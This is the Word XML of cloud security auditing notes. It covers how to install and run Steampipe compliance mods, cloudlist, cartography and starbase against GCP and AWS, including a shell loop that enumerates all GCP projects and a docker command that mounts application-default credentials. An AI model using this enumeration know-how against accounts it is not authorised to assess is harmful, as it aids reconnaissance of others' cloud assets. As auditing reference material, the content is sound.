      <w:pP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5AA889B3" w14:textId="52D215AE" w:rsidR="006F3157" w:rsidRDefault="006F3157" w:rsidP="006F3157">
      <w:pP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spacing w:val="-5"/>
            <w:sz w:val="36"/>
            <w:szCs w:val="36"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
          </w:rPr>
          <w:t>Steampipe</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6E13EB07" w14:textId="77777777" w:rsidR="006F3157" w:rsidRDefault="006F3157">
      <w:r>
        <w:t>Install</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4A5FF8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Download and install Steampipe (</w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidRPr="006F315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https://steampipe.io/downloads</w:t>
        </w:r>
      </w:hyperlink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). Or use Brew:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F508C7B" w14:textId="77777777" w:rsidR="006F3157" w:rsidRPr="006F3157" w:rsidRDefault="006F3157" w:rsidP="006F3157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702A0700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brew tap turbot/</w:t>
      </w:r>
      <w:proofErr w:type="gram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tap</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="175B6D4F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brew install </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006F3157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steampipe</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7BA45656" w14:textId="77777777" w:rsidR="006F3157" w:rsidRDefault="006F3157"/>
    <w:p w14:paraId="5E9CEEA3" w14:textId="77777777" w:rsidR="006F3157" w:rsidRDefault="006F3157">
      <w:r>
        <w:t>GCP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B0C0AE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Install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plugin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65DC9539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steampipe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plugin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install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gcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5A558685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E167BDA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Use https://github.com/turbot/steampipe-mod-gcp-compliance.git</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9A245F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git clone https://github.com/turbot/steampipe-mod-gcp-compliance.git</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377249F9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cd steampipe-mod-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-compliance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368C99CB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To run all the checks from the dashboard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF4CD66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steampipe dashboard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7894ED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To run all the checks from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rhe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cli</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F61DE4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steampipe check all</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396F1879" w14:textId="77777777" w:rsidR="006F3157" w:rsidRDefault="006F3157"/>
    <w:p w14:paraId="39415260" w14:textId="4F7DF4F7" w:rsidR="006F3157" w:rsidRDefault="006F3157">
      <w:r>
        <w:t xml:space="preserve">Check all </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>project</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7A36F253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31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In order to check all the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006F31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projects</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006F31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need to generate the </w:t>
      </w:r>
      <w:r w:rsidRPr="006F3157">
        <w:rPr>
          <w:rFonts w:ascii="var(--font-mono)" w:eastAsia="Times New Roman" w:hAnsi="var(--font-mono)" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>gcp.spc</w:t>
      </w:r>
      <w:r w:rsidRPr="006F31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indicating all the projects to test. You can just follow the indications from the following </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006F31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</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="28FB5377" w14:textId="77777777" w:rsidR="006F3157" w:rsidRPr="006F3157" w:rsidRDefault="006F3157" w:rsidP="006F31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31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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CBDB2B4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lastRenderedPageBreak/>
        <w:t>FILEPATH="/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tmp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/gcp.spc"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247D7F41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rm -rf "$FILEPATH" 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D87AE9C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59429A3F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# Generate a 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json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like object for each project</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B243B3A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for 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pid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in $(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gcloud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projects list --format="value(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projectId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)"); do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6800FFD4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echo "connection \"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gcp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_$(echo -n $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pid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| tr "-" "_</w:t>
      </w:r>
      <w:proofErr w:type="gram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" )</w:t>
      </w:r>
      <w:proofErr w:type="gram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\" {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09634741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</w:t>
      </w:r>
      <w:proofErr w:type="gram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plugin  =</w:t>
      </w:r>
      <w:proofErr w:type="gram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\"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gcp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\"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B136EB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project = \"$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pid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\"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6994B8F3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}" &gt;&gt; "$FILEPATH"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09882B7B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done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F8C20F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2D399204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# Generate the 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aggragator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to call</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A371C2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echo 'connection "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gcp_all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" {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4FCBD5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plugin      = "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gcp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" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594B9899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type        = "aggregator"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442A06D7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connections = ["</w:t>
      </w:r>
      <w:proofErr w:type="spell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gcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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_*"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B55371B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}' &gt;&gt; "$FILEPATH"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2FC7D9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57129CC8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echo "Copy $FILEPATH in ~/.steampipe/config/gcp.spc if it was correctly </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006F315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generated"</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="00159368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To check </w:t>
      </w:r>
      <w:r w:rsidRPr="006F3157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other GCP insights</w:t>
      </w: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(useful for enumerating services) use: </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidRPr="006F315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https://github.com/turbot/steampipe-mod-gcp-insights</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="56C49BBA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To check Terraform GCP code: </w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidRPr="006F315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https://github.com/turbot/steampipe-mod-terraform-gcp-compliance</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4F970916" w14:textId="77777777" w:rsidR="006F3157" w:rsidRPr="006F3157" w:rsidRDefault="006F3157" w:rsidP="006F31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315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More GCP plugins of Steampipe: </w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidRPr="006F3157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https://github.com/turbot?q=gcp</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="339CC9A9" w14:textId="77777777" w:rsidR="006F3157" w:rsidRDefault="006F3157"/>
    <w:p w14:paraId="5CBCE086" w14:textId="77777777" w:rsidR="006F3157" w:rsidRDefault="006F3157"/>
    <w:p w14:paraId="3D8F7989" w14:textId="77777777" w:rsidR="006F3157" w:rsidRDefault="006F3157"/>
    <w:p w14:paraId="75B098CE" w14:textId="77777777" w:rsidR="006F3157" w:rsidRDefault="006F3157"/>
    <w:p w14:paraId="29BBD1A1" w14:textId="77777777" w:rsidR="006F3157" w:rsidRDefault="006F3157"/>
    <w:p w14:paraId="4C46AE4A" w14:textId="77777777" w:rsidR="006F3157" w:rsidRDefault="006F3157"/>
    <w:p w14:paraId="64E53393" w14:textId="77777777" w:rsidR="006F3157" w:rsidRDefault="006F3157"/>
    <w:p w14:paraId="231F5D87" w14:textId="77777777" w:rsidR="006F3157" w:rsidRDefault="006F3157"/>
    <w:p w14:paraId="0FBAF7A9" w14:textId="77777777" w:rsidR="006F3157" w:rsidRDefault="006F3157"/>
    <w:p w14:paraId="4F74BB9A" w14:textId="760A99CB" w:rsidR="006F3157" w:rsidRDefault="006F3157">
      <w:r>
        <w:t>AWS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42795D64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Install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aws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plugin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4500AB3B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steampipe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plugin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install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aws</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="45B5D179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B31DD08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# Modify the spec indicating in "profile" the profile name to use</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F96015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nano ~/.steampipe/config/aws.spc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E80049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65FD7B2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Get some info on how the AWS account is being used</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E2A613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git clone https://github.com/turbot/steampipe-mod-aws-insights.git</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5309FBA5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cd steampipe-mod-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aws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-insights</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4107D37D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steampipe dashboard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6449477D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A486185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Get the services exposed to the internet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D226B8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git clone https://github.com/turbot/steampipe-mod-aws-perimeter.git</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A246745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cd steampipe-mod-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aws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-perimeter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019A7073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steampipe dashboard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD8AFF7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FE35572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Run the benchmarks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F51DD08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git clone https://github.com/turbot/steampipe-mod-aws-compliance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52993932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cd steampipe-mod-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aws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-compliance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B342355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steampipe dashboard # To see results in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browser</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7A3C4A7E" w14:textId="77777777" w:rsidR="006F3157" w:rsidRDefault="006F3157" w:rsidP="006F3157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steampipe check all --export=/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tmp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/output4.json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7602C313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To check Terraform AWS code: </w:t>
      </w:r>
      <w:hyperlink r:id="rId17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https://github.com/turbot/steampipe-mod-terraform-aws-compliance</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6302A11E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More AWS plugins of Steampipe: </w:t>
      </w:r>
      <w:hyperlink r:id="rId18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https://github.com/orgs/turbot/repositories?q=aws</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1F5CA7F3" w14:textId="77777777" w:rsidR="006F3157" w:rsidRDefault="006F3157"/>
    <w:p w14:paraId="545BE3A0" w14:textId="77777777" w:rsidR="006F3157" w:rsidRDefault="006F3157"/>
    <w:p w14:paraId="61AE9439" w14:textId="5C10C5F8" w:rsidR="006F3157" w:rsidRDefault="006F3157">
      <w:hyperlink r:id="rId19" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:b/>
            <w:bCs/>
            <w:strike/>
            <w:spacing w:val="-5"/>
            <w:sz w:val="36"/>
            <w:szCs w:val="36"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
          </w:rPr>
          <w:t>cs-suite</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3ECEFD26" w14:textId="237E0AE1" w:rsidR="006F3157" w:rsidRDefault="006F3157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AWS, GCP, Azure, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>DigitalOcean</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>. It requires python2.7 and looks unmaintained.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443AD94A" w14:textId="77777777" w:rsidR="006F3157" w:rsidRDefault="006F3157">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54F4394A" w14:textId="77777777" w:rsidR="006F3157" w:rsidRDefault="006F3157" w:rsidP="006F3157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Nessus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3846BFDF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Nessus has an </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>Audit Cloud Infrastructure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> scan supporting: AWS, Azure, Office 365, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>Rackspace</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">, Salesforce. Some extra configurations in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Azure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> are needed to obtain a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Client Id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3BAEBF" w14:textId="77777777" w:rsidR="006F3157" w:rsidRDefault="006F3157" w:rsidP="006F3157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hyperlink r:id="rId20" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Strong"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:color w:val="0000FF"/>
            <w:spacing w:val="-3"/>
            <w:u w:val="single"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
          </w:rPr>
          <w:t>cloudlist</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="45AB9BF8" w14:textId="77777777" w:rsidR="006F3157" w:rsidRDefault="006F3157" w:rsidP="006F3157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Cloudlist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a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multi-cloud tool for getting Assets</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Hostnames, IP Addresses) from Cloud Providers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F01133E" w14:textId="76892AFE" w:rsidR="00CB50AA" w:rsidRPr="00CB50AA" w:rsidRDefault="00CB50AA" w:rsidP="00CB50A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lastRenderedPageBreak/>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CB50A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Cloudlist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="274BF569" w14:textId="77777777" w:rsidR="00CB50AA" w:rsidRPr="00CB50AA" w:rsidRDefault="00CB50AA" w:rsidP="00CB50A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2812865A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cd /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tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="69B8EFED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wget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https://github.com/projectdiscovery/cloudlist/releases/latest/download/cloudlist_1.0.1_macOS_arm64.zip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D95101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unzip cloudlist_1.0.1_macOS_arm64.zip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A058183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chmod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+x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cloudlist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="104632AB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sudo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mv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cloudlist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/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usr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/local/bin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2C2427" w14:textId="77777777" w:rsidR="006F3157" w:rsidRDefault="006F3157"/>
    <w:p w14:paraId="3BF6AD1F" w14:textId="77777777" w:rsidR="00CB50AA" w:rsidRDefault="00CB50AA"/>
    <w:p w14:paraId="1DE95F9C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For GCP it requires service account JSON credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D05A16A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cloudlist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-config &lt;/path/to/config&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE3A3AE" w14:textId="77777777" w:rsidR="00CB50AA" w:rsidRDefault="00CB50AA"/>
    <w:p w14:paraId="3473A950" w14:textId="77777777" w:rsidR="00CB50AA" w:rsidRDefault="00CB50AA"/>
    <w:p w14:paraId="7306A1DF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hyperlink r:id="rId21" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Strong"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:color w:val="0000FF"/>
            <w:spacing w:val="-3"/>
            <w:u w:val="single"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
          </w:rPr>
          <w:t>cartography</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="607CCF09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Cartography is a Python tool that consolidates infrastructure assets and the relationships between them in an intuitive graph view powered by a Neo4j database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA1D22D" w14:textId="77777777" w:rsidR="00CB50AA" w:rsidRDefault="00CB50AA"/>
    <w:p w14:paraId="066AB3B1" w14:textId="2B036C95" w:rsidR="00CB50AA" w:rsidRPr="00CB50AA" w:rsidRDefault="00CB50AA" w:rsidP="00CB50A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br/>
        <w:t>Install</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467C51EF" w14:textId="77777777" w:rsidR="00CB50AA" w:rsidRPr="00CB50AA" w:rsidRDefault="00CB50AA" w:rsidP="00CB50A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2A60265A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Installation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45AC0D15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docker image pull ghcr.io/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lyft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</w:t>
      </w:r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cartography</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="747EB5EB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docker run --platform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linux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/amd64 ghcr.io/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lyft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/cartography cartography --</w:t>
      </w:r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help</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3C15E9AA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## Install a Neo4j DB version 3.5.*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E15299" w14:textId="77777777" w:rsidR="00CB50AA" w:rsidRDefault="00CB50AA"/>
    <w:p w14:paraId="71FCF293" w14:textId="77777777" w:rsidR="00CB50AA" w:rsidRDefault="00CB50AA"/>
    <w:p w14:paraId="752324F3" w14:textId="3D6956DD" w:rsidR="00CB50AA" w:rsidRDefault="00CB50AA">
      <w:pP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GCP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B40657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docker run --platform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linux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/amd64 \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208166AA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--volume "$HOME/.config/gcloud/application_default_credentials.json:/application_default_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credentials.json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 \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4C58E8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     -e GOOGLE_APPLICATION_CREDENTIALS="/application_default_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credentials.json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 \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFB8B41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-e NEO4j_PASSWORD="s3cr3t" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231A27B0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ghcr.io/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lyft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cartography  \</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3D715411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--neo4j-uri bolt://host.docker.internal:7687 \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB2F4CE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--neo4j-password-env-var NEO4j_PASSWORD \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F665A80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--neo4j-user neo4j</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24AACE46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7B80AE0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A861D18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It only checks for a few services inside GCP (https://lyft.github.io/cartography/modules/gcp/index.html)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06172D3D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Cloud Resource Manager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422F390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Compute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28ABA06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DNS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B35679B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Storage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD49D7F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Google Kubernetes Engine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39AAD21A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### If you can run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starbase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or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purplepanda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you will get more info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126A29BE" w14:textId="77777777" w:rsidR="00CB50AA" w:rsidRDefault="00CB50AA"/>
    <w:p w14:paraId="128C76B8" w14:textId="77777777" w:rsidR="00CB50AA" w:rsidRDefault="00CB50AA"/>
    <w:p w14:paraId="5C91436D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hyperlink r:id="rId22" w:history="1">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="0000FF"/>
            <w:spacing w:val="-3"/>
            <w:u w:val="single"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
          </w:rPr>
          <w:br/>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Strong"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:color w:val="0000FF"/>
            <w:spacing w:val="-3"/>
            <w:u w:val="single"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
          </w:rPr>
          <w:t>starbase</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4BD496B2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Starbase</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> collects assets and relationships from services and systems including cloud infrastructure, SaaS applications, security controls, and more into an intuitive graph view backed by the Neo4j database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FE057F" w14:textId="02864832" w:rsidR="00CB50AA" w:rsidRPr="00CB50AA" w:rsidRDefault="00CB50AA" w:rsidP="00CB50A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br/>
        <w:t>Install</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79259D9E" w14:textId="77777777" w:rsidR="00CB50AA" w:rsidRPr="00CB50AA" w:rsidRDefault="00CB50AA" w:rsidP="00CB50A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331CB75A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 You are going to need Node version 14, so install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nvm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following https://tecadmin.net/install-nvm-macos-with-homebrew/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB2C265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npm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install --global </w:t>
      </w:r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yarn</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="37D8A091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nvm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install </w:t>
      </w:r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14</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0C94A888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git clone https://github.com/JupiterOne/starbase.git</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E121251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cd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starbase</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="56558E02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nvm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use </w:t>
      </w:r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14</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2B35C1BD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yarn </w:t>
      </w:r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install</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="48562F6D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yarn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starbase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--help</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D66322E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 Configure manually </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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config.yaml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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depending on the env to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analyze</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="449FD06C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yarn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starbase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setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420BA48A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yarn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starbase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run</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="53B40BC9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3D350D10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 Docker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3742FFFF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git clone https://github.com/JupiterOne/starbase.git</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2063A3AB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cd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starbase</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="298A9C48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cp </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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config.yaml</w:t>
      </w:r>
      <w:proofErr w:type="gram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.example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config.yaml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="459A42BC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 Configure manually </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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config.yaml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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depending on the env to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analyze</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="49FEF233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docker build --no-cache -t </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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starbase:latest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549E6871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docker-compose run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starbase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setup</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5C198FB1" w14:textId="77777777" w:rsidR="00CB50AA" w:rsidRPr="00CB50AA" w:rsidRDefault="00CB50AA" w:rsidP="00CB50A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docker-compose run </w:t>
      </w:r>
      <w:proofErr w:type="spell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starbase</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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CB50A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run</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="42459B49" w14:textId="77777777" w:rsidR="00CB50AA" w:rsidRDefault="00CB50AA"/>
    <w:p w14:paraId="4688C390" w14:textId="77777777" w:rsidR="00CB50AA" w:rsidRDefault="00CB50AA"/>
    <w:p w14:paraId="6B1DE55F" w14:textId="74F54D58" w:rsidR="00CB50AA" w:rsidRDefault="00CB50AA">
      <w:pP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B50A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GCP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D465A8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Config for GCP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4CD684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### Check out: https://github.com/JupiterOne/graph-google-cloud/blob/main/docs/development.md</w:t>
      </w:r>
    </w:p>
